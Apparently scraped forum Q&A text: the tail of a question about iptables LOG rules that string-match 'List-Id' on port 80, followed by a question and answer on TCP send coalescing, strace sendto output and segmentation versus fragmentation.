pkts bytes target prot opt in out source destination
1 60 LOG tcp -- * * 0.0.0.0/0 0.0.0.0/0 tcp dpt:80 STRING match "List-Id" ALGO name bm TO 6500 LOG flags 0 level 4
5 276 LOG tcp -- * * 0.0.0.0/0 0.0.0.0/0 tcp dpt:80 LOG flags 0 level 4
Chain FORWARD (policy DROP 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
Chain OUTPUT (policy ACCEPT 23 packets, 4434 bytes)
pkts bytes target prot opt in out source destination
0 0 LOG tcp -- * * 0.0.0.0/0 0.0.0.0/0 tcp spt:80 STRING match "List-Id" ALGO name bm TO 6500 LOG flags 0 level 4
5 282 LOG tcp -- * * 0.0.0.0/0 0.0.0.0/0 tcp spt:80 LOG flags 0 level 4
and on CLIENT SIDE:
Chain INPUT (policy ACCEPT 28 packets, 2187 bytes)
pkts bytes target prot opt in out source destination
1 66 LOG tcp -- * * 0.0.0.0/0 0.0.0.0/0 tcp spt:80 STRING match "List-Id" ALGO name bm TO 6500 LOG flags 0 level 4
5 282 LOG tcp -- * * 0.0.0.0/0 0.0.0.0/0 tcp spt:80 LOG flags 0 level 4
Chain FORWARD (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
Chain OUTPUT (policy ACCEPT 23 packets, 1721 bytes)
pkts bytes target prot opt in out source destination
1 60 LOG tcp -- * * 0.0.0.0/0 0.0.0.0/0 tcp dpt:80 STRING match "List-Id" ALGO name bm TO 6500 LOG flags 0 level 4
5 276 LOG tcp -- * * 0.0.0.0/0 0.0.0.0/0 tcp dpt:80 LOG flags 0 level 4
So there is NO output rule match for server. Server matched IN, and client matched IN and OUT.
I dont understand how does it work :(
Tnx in advance.

TCP messages getting coalesced

I have a Java application that is writing to the network. It is writing messages in the region of 764b, +/- 5b. A pcap shows that the stream is getting IP fragmented and we can't explain this.
Linux 2.6.18-238.1.1.el5
A strace shows:
(strace -vvvv -f -tt -o strace.out -e trace=network -p $PID)
1: 2045 12:48:23.984173 sendto(45, "\0\0\0\0\0\0\2\374\0\0\0\0\0\3\n\0\0\0\0\3upd\365myData"..., 764, 0, NULL, 0) = 764
2: 15206 12:48:23.984706 sendto(131, "\0\0\0\0\0\0\2\374\0\0\0\0\0\3\n\0\0\0\0\3upd\365myData"..., 764, 0, NULL, 0 <unfinished ...>
3: 2046 12:48:23.984811 sendto(46, "\0\0\0\0\0\0\2\374\0\0\0\0\0\3\n\0\0\0\0\3upd\365myData"..., 764, 0, NULL, 0 <unfinished ...>
4: 15206 12:48:23.984893 <... sendto resumed> ) = 764
5: 2046 12:48:23.984948 <... sendto resumed> ) = 764
I am seeing packets larger than the MTU when I capture the network, which is causing fragmentation.
4809 5.848987 10.0.0.2 -> 10.0.0.5 TCP 40656 > taiclock [ACK] Seq=325501 Ack=1 Win=46 Len=1448 TSV=344627654 TSER=270108068 # First Fragment
4810 5.848991 10.0.0.5 -> 10.0.0.2 TCP taiclock > 40656 [ACK] Seq=1 Ack=326949 Win=12287 Len=0 TSV=270108081 TSER=344627643 # TCP ack
4811 5.849037 10.0.0.2 -> 10.0.0.5 TCP 40656 > taiclock [PSH, ACK] Seq=326949 Ack=1 Win=46 Len=82 TSV=344627654 TSER=270108081 # Second Frag
Questions:
1) It appears the server trying to batch the two sendto() into one IP packet, which is larger than the MTU and is therefore getting fragmented. Why?
2) Looking at the strace output for PID 2046, is the figure after the equal sign <... sendto resumed> line a total for what was sent? I.e. 764b was sent in total for line 3 and line 5? Or is 764 bytes being sent per line?
3) Are there any options I can pass to strace to log all of the sendto() output? Can't seem to find anything..
To answer your questions, in order:
1) It is perfectly normal for multiple send calls to be coalesced when using TCP as it is a stream protocol so does not preserve user level send boundaries in any way. I don't see any evidence of IP fragmentation (which would be bad) in your trace, just of TCP segmentation (which is completely normal).
2) Yes, that is the size - more specifically it is reporting the value that the system call returned after it resumed.
3) You can use "-e write=all" or "-e write=" to get strace to report the whole of the written data.

Resources